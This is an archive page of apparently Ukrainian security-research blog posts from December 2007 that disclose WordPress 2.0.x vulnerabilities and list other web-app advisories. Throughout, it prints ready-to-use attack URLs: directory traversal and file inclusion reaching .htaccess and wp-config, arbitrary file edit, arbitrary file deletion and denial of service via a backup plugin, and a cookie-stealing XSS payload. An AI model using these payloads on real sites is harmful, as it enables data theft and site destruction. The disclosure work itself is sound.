Архів для категорії 'Уразливості'

Добірка уразливостей

16:52 31.12.2007

В даній добірці уразливості в веб додатках:

  • Vulnerability in Joomla! (деталі)
  • Cross-site scripting (XSS) vulnerability in cPanel WebHost Manager (деталі)
  • Apple Safari on MacOSX may reveal user’s saved passwords (деталі)
  • safari’s saved password at risk (деталі)
  • Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability (деталі)
  • CodeAvalanche News SQL Injection (деталі)
  • nabopoll 1.2 Remote Unprotected Admin Section Vulnerability (деталі)
  • Переповнення буфера в AT-TFTP Server (деталі)
  • Vulnerability in Sun Java Development Kit (JDK), Java Runtime Environment (JRE) and Java System Development Kit (SDK) (деталі)
  • New squirrelmail packages fix cross-site scripting (деталі)
  • Міжсайтовий скриптінг в iNews Publisher (деталі)
  • Міжсайтовий скриптінг в mmgallery (деталі)
  • PHP remote file inclusion vulnerability in cwmCounter (деталі)
  • PHP remote file inclusion vulnerability in Paristemi 0.8.3 (деталі)
  • SQL-ін’єкція в Basic Forum (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:43 30.12.2007

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Arbitrary file edit, Local file include, Directory traversal та Full path disclosure в WordPress

22:52 30.12.2007

Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.

В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include та Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Нові Local file include, Directory traversal та Full path disclosure в WordPress

23:54 29.12.2007

В жовтні, 31.10.2007 (в edit.php), і в листопаді, 29.11.2007 (в admin.php), я знайшов нові Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах edit.php та admin.php в параметрі page.

Full path disclosure:

http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Добірка уразливостей

16:37 29.12.2007

В даній добірці уразливості в веб додатках:

  • XSS in JBoss Portal (деталі)
  • Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability (деталі)
  • Radical Technologies - Portal Search - multiple XSS issue (деталі)
  • Jportal 2.3.1 CSRF vulnerability (деталі)
  • DotClear Full Path Disclosure Vulnerability (деталі)
  • SQL injection in mosgetparam implementation in Joomla! (деталі)
  • Vulnerability in Joomla! (деталі)
  • PHP remote file inclusion vulnerability in Azucar CMS 1.3 (деталі)
  • Cross-site scripting (XSS) vulnerability in Knusperleicht ShoutBox 2.6 (деталі)
  • Vulnerability in Bandwebsite (aka Bandsite portal system) 1.5 (деталі)
  • PHP-інклюдинг в site_news (деталі)
  • Міжсайтовий скриптінг в Ace Helpdesk (деталі)
  • PHP remote file inclusion vulnerability in PowerClan (деталі)
  • CRLF injection vulnerability in Oracle Portal 10g (деталі)
  • Декілька уразливостей в Sisfo Kampus (деталі)

Local file include, Directory traversal та Full path disclosure в WordPress

23:50 28.12.2007

В червні, 09.06.2007 (в admin.php) і 15.06.2007 (в themes.php), я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах admin.php (параметр import) та themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файлі admin.php через параметр import можна лише підключити файли з php розширенням.

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Уразливість на itware.com.ua

19:27 28.12.2007

30.07.2007

У лютому, 06.02.2007, я знайшов Cross-Site Scripting уразливість на популярному проекті http://itware.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.12.2007

HTTP Response Splitting + XSS:

Дана уразливість вже виправлена.

Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress

23:49 27.12.2007

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Добірка уразливостей

17:29 27.12.2007

В даній добірці уразливості в веб додатках:

DoS та File Disclosure в WordPress

23:52 26.12.2007

Ще в січні були оприлюднені DoS (віддалений і локальний) та File Disclosure уразливості в WordPress. Вразливі версії WordPress до 2.1.

  • Multiple Remote Vulnerabilities in Wordpress (деталі)

Denial of Service та File Disclosure дірки наявні в XMLRPC та Pingback реалізаціях в движку. Дані уразливості були виправлені в нових версіях WP.